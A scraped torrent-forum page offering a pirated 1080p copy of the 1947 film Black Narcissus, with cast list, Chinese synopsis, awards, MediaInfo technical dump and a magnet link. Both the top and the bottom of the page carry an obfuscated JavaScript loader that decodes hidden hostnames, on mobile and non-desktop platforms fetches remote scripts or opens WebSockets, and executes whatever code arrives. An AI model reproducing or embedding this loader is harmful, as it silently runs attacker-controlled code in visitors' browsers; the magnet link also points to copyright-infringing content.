黑水仙[中文字幕].Black.Narcissus.1947.1080p.FriDay.WEB-DL.H264.AAC 2.76GB

版主小s 1月前 232

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 黑水仙 / 思凡(港) / 空门遗恨(台) / 雪岭春梦

◎片 名 Black Narcissus

◎年 代 1947

◎产 地 英国

◎类 别 剧情

◎语 言 英语

◎上映日期 1947-05-26(英国)

◎IMDb链接 https://www.imdb.com/title/tt0039192/

◎豆瓣评分 7.7/10 (2648人评价)

◎豆瓣链接 https://movie.douban.com/subject/1292733/

◎片 长 100 分钟

◎导 演 迈克尔·鲍威尔 Michael Powell (id:1027955)

埃默里克·普雷斯伯格 Emeric Pressburger (id:1037079)

◎编 剧 迈克尔·鲍威尔 Michael Powell (id:1027955)

埃默里克·普雷斯伯格 Emeric Pressburger (id:1037079)

◎演 员 黛博拉·蔻儿 Deborah Kerr (id:1027301)

弗劳拉·罗博森 Flora Robson (id:1000546)

简·西蒙斯 Jean Simmons (id:1007033)

大卫·法拉尔 David Farrar (id:1023227)

萨布 Sabu (id:1004991)

凯思琳·拜荣 Kathleen Byron (id:1014300)

Jenny Laird Jenny Laird (id:1108624)

杰克·卡迪夫 Jack Cardiff (id:1050278)

雷金纳德·米尔斯 Reginald Mills (id:1292130)

◎标 签 英国 / 英国电影 / 1947 / 宗教 / 1940s / 迈克尔·鲍威尔 / MichaelPowell / CC

◎简 介

剧情讲述印度加尔各答修道院的克罗塔修女奉调到纳普修道院当院长,纳普修道院在印度北方海拔8000尺高山上,常年刮着强风。克罗塔建立学校和医院,连小将军都来受教育。克罗塔虽从百废待兴中辛勤工作,治理得有条有理,但年轻的修女们在偏远高山上全凭自律修持,唯美的环境使精神受到挑战,在不断的诱惑下,无法把持者只有放弃圣职。在此中有如智者所言,只有圣者和俗人可能生存——因为生活在大自然中只有修身养性或是随波逐流。

后来,发生了幼儿病死及露丝修女因爱恨还俗并欲杀害院长反坠入深谷等事件,克罗塔也因此离开纳普修道院以弥平心中的伤痕。

相关评价

迈克尔.鲍威尔导演,本片表现出人性在环境的影响下可以改变的不争事实,在人性脆弱的时候,就不能抗拒环境带给它的压力,和抵抗外来环境的影响的自制。影片在表现角色内心挣扎的细微活动细致,演员在诠释各种角色的角度...

◎获奖情况 (共3项)

第20届奥斯卡金像奖 (1948)

彩色片最佳摄影

└──杰克·卡迪夫 (id:1050278)

彩色片最佳艺术指导和布景

└──阿尔弗雷德·荣格 (id:1008715)

第5届金球奖 (1948)

电影类 最佳摄影

└──杰克·卡迪夫 (id:1050278)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 217507030904387688857126784367789302803 (0xA3A25494A8A1BAC20AAAB606C3EB6413)

  4. Complete name : [email protected]OM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 2.76 GiB

  8. Duration : 1 h 40 min

  9. Overall bit rate : 3 937 kb/s

  10. Encoded date : UTC 2021-10-23 13:49:59

  11. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : AVC

  16. Format/Info : Advanced Video Codec

  17. Format profile : [email protected]

  18. Format settings : CABAC / 1 Ref Frames

  19. Format settings, CABAC : Yes

  20. Format settings, Reference frames : 1 frame

  21. Format settings, GOP : M=1, N=60

  22. Codec ID : V_MPEG4/ISO/AVC

  23. Duration : 1 h 40 min

  24. Bit rate mode : Constant

  25. Bit rate : 3 809 kb/s

  26. Nominal bit rate : 4 000 kb/s

  27. Width : 1 920 pixels

  28. Height : 1 080 pixels

  29. Display aspect ratio : 16:9

  30. Frame rate mode : Constant

  31. Frame rate : 29.970 (30000/1001/53354) FPS

  32. Color space : YUV

  33. Chroma subsampling : 4:2:0

  34. Bit depth : 8 bits

  35. Scan type : Progressive

  36. Bits/(Pixel*Frame) : 0.061

  37. Stream size : 2.67 GiB (97%)

  38. Language : English

  39. Default : Yes

  40. Forced : No


  41. Audio

  42. ID : 2

  43. Format : AAC LC

  44. Format/Info : Advanced Audio Codec Low Complexity

  45. Codec ID : A_AAC-2

  46. Duration : 1 h 40 min

  47. Bit rate : 125 kb/s

  48. Channel(s) : 2 channels

  49. Channel layout : L R

  50. Sampling rate : 48.0 kHz

  51. Frame rate : 46.875 FPS (1024 SPF)

  52. Compression mode : Lossy

  53. Stream size : 90.0 MiB (3%)

  54. Title : English

  55. Language : English

  56. Default : Yes

  57. Forced : No


  58. Text #1

  59. ID : 3

  60. Format : UTF-8

  61. Codec ID : S_TEXT/UTF8

  62. Codec ID/Info : UTF-8 Plain Text

  63. Duration : 1 h 39 min

  64. Bit rate : 42 b/s

  65. Count of elements : 1348

  66. Stream size : 31.3 KiB (0%)

  67. Title : Chinese Simplified

  68. Language : Chinese

  69. Default : Yes

  70. Forced : No


  71. Text #2

  72. ID : 4

  73. Format : UTF-8

  74. Codec ID : S_TEXT/UTF8

  75. Codec ID/Info : UTF-8 Plain Text

  76. Duration : 1 h 39 min

  77. Bit rate : 42 b/s

  78. Count of elements : 1348

  79. Stream size : 31.3 KiB (0%)

  80. Title : Chinese Traditional

  81. Language : Chinese

  82. Default : No

  83. Forced : No




复制代码


TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:52E7842B0018313990441672B1A8ADC3CEFB5961

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};